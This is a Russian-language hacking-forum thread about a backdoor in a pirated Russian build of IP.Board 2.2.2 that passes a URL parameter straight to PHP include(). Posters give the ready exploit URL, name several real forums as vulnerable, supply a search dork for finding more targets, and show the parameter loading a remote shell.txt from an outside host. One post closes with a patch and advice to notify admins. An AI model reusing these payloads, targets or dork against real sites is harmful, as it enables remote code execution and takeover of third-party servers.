Сегодня изучал свой форум на предмет пхп иньекций и наткнулся на бэкдор.. погуглил немного и нашел в сети еше штук 30 таких форумов.. Как я понял его просто кто-то всунул туда и стал распространять... В общем работает тока на IPB 2.2.2 Русская версия (и то не на всех) Code: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL] Как вам, а?
Видимо уже кто-то сломал.. или админы проснулись %) Вот еще парочка. Code: http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL] Code: http://www.forum.partisans.com.ua/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
Написано же вот и подставляй туда свой урл Вот пример: Code: http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://forum.antichat.ru/showthread.php
Code: dork: "Русская версия IP.Board 2.2.2 © 2007 IPS, Inc." exploit: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://4elovek.spb.ru/shell.txt Куда уж подробнее?? Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил.. Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит.. Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так: /source/action_public/profile.php строка 885: Code: if ( $chk ) { @include ($chk); exit(); } Меняем на: Code: if ( $chk ) { echo "Fuck you, Spilberg... Fixed by 5hr4M..."; exit(); }
